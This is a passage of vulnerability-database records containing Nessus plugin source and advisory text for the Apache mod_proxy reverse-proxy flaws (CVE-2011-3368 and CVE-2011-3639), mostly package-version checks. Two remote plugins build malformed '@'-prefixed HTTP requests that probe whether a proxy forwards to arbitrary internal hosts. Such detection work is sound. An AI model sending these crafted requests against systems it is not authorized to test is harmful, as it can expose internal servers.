(rand() % 535 + 65000), page);\n res = http_send_recv3(method:'GET', item:url, port:port, exit_on_fail:TRUE);\n headers = parse_http_headers(status_line:res[0], headers:res[1]);\n http_code = headers['$code'];\n\n # the patched server should always send a 400. 
\n # we'll explicitly check for a 503 (resulting from trying to connect to a closed port)\n if (http_code == 503)\n {\n # this will prevent the other plugin (that checks for the\n # incomplete fix for this CVE) from running\n set_kb_item(name:'/tmp/CVE-2011-3368', value:TRUE);\n\n if (report_verbosity > 0)\n {\n report =\n '\\nNessus verified this by sending the following request :\\n\\n' +\n chomp(http_last_sent_request()) + '\\n';\n\n if (report_verbosity > 0)\n {\n report +=\n '\\nWhich resulted in a non-400 response :\\n\\n' +\n res[0] +\n chomp(res[1]) + '\\n';\n }\n\n security_warning(port:port, extra:report);\n }\n else security_warning(port);\n\n exit(0);\n }\n }\n}\nexit(1, 'Unable to determine if the system is vulnerable on port ' + port);\n", "cvss": {"score": 5, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2022-03-27T14:38:39", "description": "The version of Apache HTTP Server running on the remote host has an information disclosure vulnerability. When configured as a reverse proxy, improper use of the RewriteRule and ProxyPassMatch directives could cause the web server to proxy requests to arbitrary hosts. 
This could allow a remote attacker to indirectly send requests to intranet servers by making specially crafted HTTP 0.9 requests.\n\nThis vulnerability only affects versions 2.2.x before 2.2.18 that have backported the fix for CVE-2011-3368.", "cvss3": {"score": null, "vector": null}, "published": "2012-02-09T00:00:00", "type": "nessus", "title": "Apache HTTP Server mod_proxy Reverse Proxy HTTP 0.9 Information Disclosure", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2011-3368", "CVE-2011-3639"], "modified": "2018-06-27T00:00:00", "cpe": ["cpe:/a:apache:http_server"], "id": "APACHE_MOD_PROXY_INFO_LEAK2.NASL", "href": "https://www.tenable.com/plugins/nessus/57875", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\n\ninclude(\"compat.inc\");\n\n\nif (description)\n{\n script_id(57875);\n script_version(\"1.3\");\n script_cvs_date(\"Date: 2018/06/27 18:42:26\");\n\n script_cve_id(\"CVE-2011-3639\");\n script_bugtraq_id(51869);\n\n script_name(english:\"Apache HTTP Server mod_proxy Reverse Proxy HTTP 0.9 Information Disclosure\");\n script_summary(english:\"Make a malformed HTTP request\");\n\n script_set_attribute(\n attribute:\"synopsis\",\n value:\n\"The web server running on the remote host has an information\ndisclosure vulnerability.\"\n );\n script_set_attribute(\n attribute:\"description\",\n value:\n\"The version of Apache HTTP Server running on the remote host has an\ninformation disclosure vulnerability. When configured as a reverse\nproxy, improper use of the RewriteRule and ProxyPassMatch directives\ncould cause the web server to proxy requests to arbitrary hosts. 
This\ncould allow a remote attacker to indirectly send requests to intranet\nservers by making specially crafted HTTP 0.9 requests.\n\nThis vulnerability only affects versions 2.2.x before 2.2.18 that have\nbackported the fix for CVE-2011-3368.\"\n );\n script_set_attribute(attribute:\"see_also\", value:\"https://bugzilla.novell.com/show_bug.cgi?id=722545#c15\");\n script_set_attribute(attribute:\"see_also\", value:\"http://article.gmane.org/gmane.comp.apache.devel/45983\");\n script_set_attribute(attribute:\"see_also\", value:\"http://svn.apache.org/viewvc?view=revision&revision=1188745\");\n script_set_attribute(\n attribute:\"solution\",\n value:\"Contact the distro/vendor for the latest update of Apache httpd.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:N/A:N\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploithub_sku\", value:\"EH-14-410\");\n script_set_attribute(attribute:\"exploit_framework_exploithub\", value:\"true\");\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2011/10/25\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2011/10/25\"); # fixed upstream\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2012/02/09\");\n script_set_attribute(attribute:\"plugin_type\", value:\"remote\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:apache:http_server\");\n script_end_attributes();\n\n script_category(ACT_ATTACK);\n script_family(english:\"Web Servers\");\n\n script_copyright(english:\"This script is Copyright (C) 2012-2018 Tenable Network Security, Inc.\");\n\n script_dependencies(\"apache_mod_proxy_info_leak.nasl\");\n script_require_ports(\"Services/www\", 80);\n script_exclude_keys(\"/tmp/CVE-2011-3368\");\n\n 
exit(0);\n}\n\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"http.inc\");\n\nport = get_http_port(default:80);\n\n# Make sure this looks like Apache unless paranoid\nif (report_paranoia < 2)\n{\n server = http_server_header(port:port);\n\n if ( 'ibm_http_server' >!< tolower(server) && 'apache' >!< tolower(server) && 'oracle http server' >!< tolower(server) && 'oracle-http-server' >!< tolower(server) )\n exit(0, 'The web server on port ' + port + ' doesn\\'t look like an Apache-based httpd');\n\n # looks like Apache _httpd_\n if ('apache' >< tolower(server) && ( 'coyote' >< tolower(server) || 'tomcat' >< tolower(server)) )\n exit(0, 'The web server on port ' + port + ' doesn\\'t look like Apache httpd');\n}\n\npages = make_list('/');\n\nforeach page (pages)\n{\n # GET 1324:@target-host/page\n # misconfigured servers reconstruct the URI as http://intended-host@target-host/page\n # instead of responding with an HTTP 400\n url = strcat(unixtime(), ':@', get_host_ip(), page);\n res = http_send_recv3(method:'GET', item:url, version:9, port:port, exit_on_fail:TRUE);\n\n # the patched server should always send a 400.\n # HTTP 0.9 won't send a status line so the best we can do is check for the default 400 page.\n # Need to skip over pages that respond to valid requests with a 503, since we will rely on a\n # 503 response after making the next request\n if ('<title>400 Bad Request</title>' >!< res[2] && '<title>503 Service Temporarily Unavailable</title>' >!< res[2])\n {\n # GET 1324:@target-host:likely-closed-port/page\n # misconfigured servers reconstruct the URI as http://intended-host@target-host:likely-closed-port/page\n # instead of responding with an HTTP 400\n url = strcat(unixtime(), ':@localhost:', (rand() % 535 + 65000), page);\n res = http_send_recv3(method:'GET', item:url, version:9, port:port, exit_on_fail:TRUE);\n\n # the patched server should always send a 400. 
\n # Again, we won't get a status code via HTTP 0.9 so the best we can do is check for the default\n # 503 page (resulting from trying to connect to a closed port)\n if ('<title>503 Service Temporarily Unavailable</title>' >< res[2])\n {\n if (report_verbosity > 0)\n {\n report =\n '\\nNessus verified this by sending the following request :\\n\\n' +\n chomp(http_last_sent_request()) + '\\n';\n\n if (report_verbosity > 0)\n {\n report +=\n '\\nWhich resulted in a non-400 response :\\n\\n' +\n chomp(res[2]) + '\\n';\n }\n\n security_warning(port:port, extra:report);\n }\n else security_warning(port);\n\n exit(0);\n }\n }\n}\nexit(0, 'The web server listening on port '+port+' is likely not affected.');\n", "cvss": {"score": 5, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2022-03-27T14:58:03", "description": "Updated httpd packages that fix one security issue and one bug are now available for Red Hat Enterprise Linux 4 and 5.\n\nThe Red Hat Security Response Team has rated this update as having moderate security impact. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available from the CVE link in the References section.\n\nThe Apache HTTP Server is a popular web server.\n\nIt was discovered that the Apache HTTP Server did not properly validate the request URI for proxied requests. In certain configurations, if a reverse proxy used the ProxyPassMatch directive, or if it used the RewriteRule directive with the proxy flag, a remote attacker could make the proxy connect to an arbitrary server, possibly disclosing sensitive information from internal web servers not directly accessible to the attacker. (CVE-2011-3368)\n\nRed Hat would like to thank Context Information Security for reporting this issue.\n\nThis update also fixes the following bug :\n\n* The fix for CVE-2011-3192 provided by the RHSA-2011:1245 update introduced regressions in the way httpd handled certain Range HTTP header values. 
This update corrects those regressions. (BZ#736593, BZ#736594)\n\nAll httpd users should upgrade to these updated packages, which contain backported patches to correct these issues. After installing the updated packages, the httpd daemon must be restarted for the update to take effect.", "cvss3": {"score": null, "vector": null}, "published": "2011-10-21T00:00:00", "type": "nessus", "title": "CentOS 4 / 5 : httpd (CESA-2011:1392)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2011-3192", "CVE-2011-3368"], "modified": "2021-01-04T00:00:00", "cpe": ["p-cpe:/a:centos:centos:httpd", "p-cpe:/a:centos:centos:httpd-devel", "p-cpe:/a:centos:centos:httpd-manual", "p-cpe:/a:centos:centos:httpd-suexec", "p-cpe:/a:centos:centos:mod_ssl", "cpe:/o:centos:centos:4", "cpe:/o:centos:centos:5"], "id": "CENTOS_RHSA-2011-1392.NASL", "href": "https://www.tenable.com/plugins/nessus/56570", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Red Hat Security Advisory RHSA-2011:1392 and \n# CentOS Errata and Security Advisory 2011:1392 respectively.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(56570);\n script_version(\"1.16\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/04\");\n\n script_cve_id(\"CVE-2011-3368\");\n script_bugtraq_id(49957);\n script_xref(name:\"RHSA\", value:\"2011:1392\");\n\n script_name(english:\"CentOS 4 / 5 : httpd (CESA-2011:1392)\");\n script_summary(english:\"Checks rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote CentOS host is missing one or more security updates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Updated httpd packages that fix one security issue and one bug are now\navailable for Red Hat Enterprise Linux 4 and 5.\n\nThe Red Hat Security 
Response Team has rated this update as having\nmoderate security impact. A Common Vulnerability Scoring System (CVSS)\nbase score, which gives a detailed severity rating, is available from\nthe CVE link in the References section.\n\nThe Apache HTTP Server is a popular web server.\n\nIt was discovered that the Apache HTTP Server did not properly\nvalidate the request URI for proxied requests. In certain\nconfigurations, if a reverse proxy used the ProxyPassMatch directive,\nor if it used the RewriteRule directive with the proxy flag, a remote\nattacker could make the proxy connect to an arbitrary server, possibly\ndisclosing sensitive information from internal web servers not\ndirectly accessible to the attacker. (CVE-2011-3368)\n\nRed Hat would like to thank Context Information Security for reporting\nthis issue.\n\nThis update also fixes the following bug :\n\n* The fix for CVE-2011-3192 provided by the RHSA-2011:1245 update\nintroduced regressions in the way httpd handled certain Range HTTP\nheader values. This update corrects those regressions. (BZ#736593,\nBZ#736594)\n\nAll httpd users should upgrade to these updated packages, which\ncontain backported patches to correct these issues. 
After installing\nthe updated packages, the httpd daemon must be restarted for the\nupdate to take effect.\"\n );\n # https://lists.centos.org/pipermail/centos-announce/2011-November/018171.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?55083c8a\"\n );\n # https://lists.centos.org/pipermail/centos-announce/2011-November/018172.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?0cbcfc97\"\n );\n # https://lists.centos.org/pipermail/centos-announce/2011-October/018125.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?1569ea8b\"\n );\n # https://lists.centos.org/pipermail/centos-announce/2011-October/018126.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?3f65d4a6\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected httpd packages.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:N/A:N\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:httpd\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:httpd-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:httpd-manual\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:httpd-suexec\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:mod_ssl\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:centos:centos:4\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:centos:centos:5\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2011/10/05\");\n 
script_set_attribute(attribute:\"patch_publication_date\", value:\"2011/11/09\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2011/10/21\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2011-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"CentOS Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/CentOS/release\", \"Host/CentOS/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/CentOS/release\");\nif (isnull(release) || \"CentOS\" >!< release) audit(AUDIT_OS_NOT, \"CentOS\");\nos_ver = pregmatch(pattern: \"CentOS(?: Linux)? release ([0-9]+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"CentOS\");\nos_ver = os_ver[1];\nif (! 
preg(pattern:\"^(4|5)([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"CentOS 4.x / 5.x\", \"CentOS \" + os_ver);\n\nif (!get_kb_item(\"Host/CentOS/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && \"ia64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"CentOS\", cpu);\n\n\nflag = 0;\nif (rpm_check(release:\"CentOS-4\", cpu:\"i386\", reference:\"httpd-2.0.52-49.ent.centos4\")) flag++;\nif (rpm_check(release:\"CentOS-4\", cpu:\"x86_64\", reference:\"httpd-2.0.52-49.ent.centos4\")) flag++;\nif (rpm_check(release:\"CentOS-4\", cpu:\"i386\", reference:\"httpd-devel-2.0.52-49.ent.centos4\")) flag++;\nif (rpm_check(release:\"CentOS-4\", cpu:\"x86_64\", reference:\"httpd-devel-2.0.52-49.ent.centos4\")) flag++;\nif (rpm_check(release:\"CentOS-4\", cpu:\"i386\", reference:\"httpd-manual-2.0.52-49.ent.centos4\")) flag++;\nif (rpm_check(release:\"CentOS-4\", cpu:\"x86_64\", reference:\"httpd-manual-2.0.52-49.ent.centos4\")) flag++;\nif (rpm_check(release:\"CentOS-4\", cpu:\"i386\", reference:\"httpd-suexec-2.0.52-49.ent.centos4\")) flag++;\nif (rpm_check(release:\"CentOS-4\", cpu:\"x86_64\", reference:\"httpd-suexec-2.0.52-49.ent.centos4\")) flag++;\nif (rpm_check(release:\"CentOS-4\", cpu:\"i386\", reference:\"mod_ssl-2.0.52-49.ent.centos4\")) flag++;\nif (rpm_check(release:\"CentOS-4\", cpu:\"x86_64\", reference:\"mod_ssl-2.0.52-49.ent.centos4\")) flag++;\n\nif (rpm_check(release:\"CentOS-5\", reference:\"httpd-2.2.3-53.el5.centos.3\")) flag++;\nif (rpm_check(release:\"CentOS-5\", reference:\"httpd-devel-2.2.3-53.el5.centos.3\")) flag++;\nif (rpm_check(release:\"CentOS-5\", reference:\"httpd-manual-2.2.3-53.el5.centos.3\")) flag++;\nif (rpm_check(release:\"CentOS-5\", reference:\"mod_ssl-2.2.3-53.el5.centos.3\")) flag++;\n\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_WARNING,\n extra : rpm_report_get()\n );\n 
exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"httpd / httpd-devel / httpd-manual / httpd-suexec / mod_ssl\");\n}\n", "cvss": {"score": 5, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2021-10-16T02:06:35", "description": "The MITRE CVE database describes these CVEs as :\n\nThe mod_proxy module in the Apache HTTP Server 1.3.x through 1.3.42, 2.0.x through 2.0.64, and 2.2.x through 2.2.21 does not properly interact with use of (1) RewriteRule and (2) ProxyPassMatch pattern matches for configuration of a reverse proxy, which allows remote attackers to send requests to intranet servers via a malformed URI containing an initial @ (at sign) character. \n\nThe mod_proxy_ajp module in the Apache HTTP Server before 2.2.21, when used with mod_proxy_balancer in certain configurations, allows remote attackers to cause a denial of service (temporary 'error state' in the backend server) via a malformed HTTP request.\n\nIt was discovered that the Apache HTTP Server did not properly validate the request URI for proxied requests. In certain configurations, if a reverse proxy used the ProxyPassMatch directive, or if it used the RewriteRule directive with the proxy flag, a remote attacker could make the proxy connect to an arbitrary server, possibly disclosing sensitive information from internal web servers not directly accessible to the attacker.\n\nIt was discovered that mod_proxy_ajp incorrectly returned an 'Internal Server Error' response when processing certain malformed HTTP requests, which caused the back-end server to be marked as failed in configurations where mod_proxy was used in load balancer mode. 
A remote attacker could cause mod_proxy to not send requests to back-end AJP (Apache JServ Protocol) servers for the retry timeout period or until all back-end servers were marked as failed.", "cvss3": {"score": null, "vector": null}, "published": "2013-09-04T00:00:00", "type": "nessus", "title": "Amazon Linux AMI : httpd (ALAS-2011-09)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2011-3348", "CVE-2011-3368"], "modified": "2015-01-30T00:00:00", "cpe": ["p-cpe:/a:amazon:linux:httpd", "p-cpe:/a:amazon:linux:httpd-debuginfo", "p-cpe:/a:amazon:linux:httpd-devel", "p-cpe:/a:amazon:linux:httpd-manual", "p-cpe:/a:amazon:linux:httpd-tools", "p-cpe:/a:amazon:linux:mod_ssl", "cpe:/o:amazon:linux"], "id": "ALA_ALAS-2011-09.NASL", "href": "https://www.tenable.com/plugins/nessus/69568", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Amazon Linux AMI Security Advisory ALAS-2011-09.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(69568);\n script_version(\"$Revision: 1.8 $\");\n script_cvs_date(\"$Date: 2015/01/30 14:43:52 $\");\n\n script_cve_id(\"CVE-2011-3348\", \"CVE-2011-3368\");\n script_xref(name:\"ALAS\", value:\"2011-09\");\n script_xref(name:\"RHSA\", value:\"2011:1391\");\n\n script_name(english:\"Amazon Linux AMI : httpd (ALAS-2011-09)\");\n script_summary(english:\"Checks rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Amazon Linux AMI host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"The MITRE CVE database describes these CVEs as :\n\nThe mod_proxy module in the Apache HTTP Server 1.3.x through 1.3.42,\n2.0.x through 2.0.64, and 2.2.x through 2.2.21 does not properly\ninteract with use of (1) RewriteRule and (2) ProxyPassMatch pattern\nmatches for configuration of a reverse proxy, which allows remote\nattackers to send 
requests to intranet servers via a malformed URI\ncontaining an initial @ (at sign) character. \n\nThe mod_proxy_ajp module in the Apache HTTP Server before 2.2.21, when\nused with mod_proxy_balancer in certain configurations, allows remote\nattackers to cause a denial of service (temporary 'error state' in the\nbackend server) via a malformed HTTP request.\n\nIt was discovered that the Apache HTTP Server did not properly\nvalidate the request URI for proxied requests. In certain\nconfigurations, if a reverse proxy used the ProxyPassMatch directive,\nor if it used the RewriteRule directive with the proxy flag, a remote\nattacker could make the proxy connect to an arbitrary server, possibly\ndisclosing sensitive information from internal web servers not\ndirectly accessible to the attacker.\n\nIt was discovered that mod_proxy_ajp incorrectly returned an 'Internal\nServer Error' response when processing certain malformed HTTP\nrequests, which caused the back-end server to be marked as failed in\nconfigurations where mod_proxy was used in load balancer mode. A\nremote attacker could cause mod_proxy to not send requests to back-end\nAJP (Apache JServ Protocol) servers for the retry timeout period or\nuntil all back-end servers were marked as failed.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://alas.aws.amazon.com/ALAS-2011-9.html\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\n\"Run 'yum upgrade httpd' to upgrade your system. 
Then run 'service\nhttpd restart' to restart the Apache HTTP Server.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:N/A:N\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:httpd\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:httpd-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:httpd-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:httpd-manual\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:httpd-tools\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:mod_ssl\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:amazon:linux\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2011/10/31\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2013/09/04\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2013-2015 Tenable Network Security, Inc.\");\n script_family(english:\"Amazon Linux Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/AmazonLinux/release\", \"Host/AmazonLinux/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/AmazonLinux/release\")) audit(AUDIT_OS_NOT, \"Amazon Linux AMI\");\nif (!get_kb_item(\"Host/AmazonLinux/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\nflag = 0;\nif (rpm_check(release:\"ALA\", reference:\"httpd-2.2.21-1.19.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"httpd-debuginfo-2.2.21-1.19.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", 
reference:\"httpd-devel-2.2.21-1.19.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"httpd-manual-2.2.21-1.19.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"httpd-tools-2.2.21-1.19.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"mod_ssl-2.2.21-1.19.amzn1\")) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:rpm_report_get());\n else security_warning(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"httpd / httpd-debuginfo / httpd-devel / httpd-manual / httpd-tools / etc\");\n}\n", "cvss": {"score": 5, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2021-10-16T01:48:48", "description": "It was discovered that the Apache HTTP Server did not properly validate the request URI for proxied requests. In certain configurations, if a reverse proxy used the ProxyPassMatch directive, or if it used the RewriteRule directive with the proxy flag, a remote attacker could make the proxy connect to an arbitrary server, possibly disclosing sensitive information from internal web servers not directly accessible to the attacker. (CVE-2011-3368)\n\nIt was discovered that mod_proxy_ajp incorrectly returned an 'Internal Server Error' response when processing certain malformed HTTP requests, which caused the back-end server to be marked as failed in configurations where mod_proxy was used in load balancer mode. A remote attacker could cause mod_proxy to not send requests to back-end AJP (Apache JServ Protocol) servers for the retry timeout period or until all back-end servers were marked as failed. 
(CVE-2011-3348)", "cvss3": {"score": null, "vector": null}, "published": "2014-10-12T00:00:00", "type": "nessus", "title": "Amazon Linux AMI : httpd (ALAS-2011-9)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2011-3348", "CVE-2011-3368"], "modified": "2018-04-18T00:00:00", "cpe": ["p-cpe:/a:amazon:linux:httpd", "p-cpe:/a:amazon:linux:httpd-debuginfo", "p-cpe:/a:amazon:linux:httpd-devel", "p-cpe:/a:amazon:linux:httpd-manual", "p-cpe:/a:amazon:linux:httpd-tools", "p-cpe:/a:amazon:linux:mod_ssl", "cpe:/o:amazon:linux"], "id": "ALA_ALAS-2011-9.NASL", "href": "https://www.tenable.com/plugins/nessus/78270", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Amazon Linux AMI Security Advisory ALAS-2011-9.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(78270);\n script_version(\"1.4\");\n script_cvs_date(\"Date: 2018/04/18 15:09:34\");\n\n script_cve_id(\"CVE-2011-3348\", \"CVE-2011-3368\");\n script_xref(name:\"ALAS\", value:\"2011-9\");\n script_xref(name:\"RHSA\", value:\"2011:1391\");\n\n script_name(english:\"Amazon Linux AMI : httpd (ALAS-2011-9)\");\n script_summary(english:\"Checks rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Amazon Linux AMI host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"It was discovered that the Apache HTTP Server did not properly\nvalidate the request URI for proxied requests. In certain\nconfigurations, if a reverse proxy used the ProxyPassMatch directive,\nor if it used the RewriteRule directive with the proxy flag, a remote\nattacker could make the proxy connect to an arbitrary server, possibly\ndisclosing sensitive information from internal web servers not\ndirectly accessible to the attacker. 
(CVE-2011-3368)\n\nIt was discovered that mod_proxy_ajp incorrectly returned an 'Internal\nServer Error' response when processing certain malformed HTTP\nrequests, which caused the back-end server to be marked as failed in\nconfigurations where mod_proxy was used in load balancer mode. A\nremote attacker could cause mod_proxy to not send requests to back-end\nAJP (Apache JServ Protocol) servers for the retry timeout period or\nuntil all back-end servers were marked as failed. (CVE-2011-3348)\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://alas.aws.amazon.com/ALAS-2011-9.html\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Run 'yum update httpd' to update your system.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:N/A:N\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:httpd\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:httpd-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:httpd-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:httpd-manual\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:httpd-tools\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:mod_ssl\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:amazon:linux\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2011/10/31\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2014/10/12\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2014-2018 Tenable Network Security, Inc.\");\n script_family(english:\"Amazon Linux Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", 
\"Host/AmazonLinux/release\", \"Host/AmazonLinux/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\n\nrelease = get_kb_item(\"Host/AmazonLinux/release\");\nif (isnull(release) || !strlen(release)) audit(AUDIT_OS_NOT, \"Amazon Linux\");\nos_ver = pregmatch(pattern: \"^AL(A|\\d)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Amazon Linux\");\nos_ver = os_ver[1];\nif (os_ver != \"A\")\n{\n if (os_ver == 'A') os_ver = 'AMI';\n audit(AUDIT_OS_NOT, \"Amazon Linux AMI\", \"Amazon Linux \" + os_ver);\n}\n\nif (!get_kb_item(\"Host/AmazonLinux/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\nflag = 0;\nif (rpm_check(release:\"ALA\", reference:\"httpd-2.2.21-1.19.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"httpd-debuginfo-2.2.21-1.19.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"httpd-devel-2.2.21-1.19.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"httpd-manual-2.2.21-1.19.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"httpd-tools-2.2.21-1.19.amzn1\")) flag++;\nif 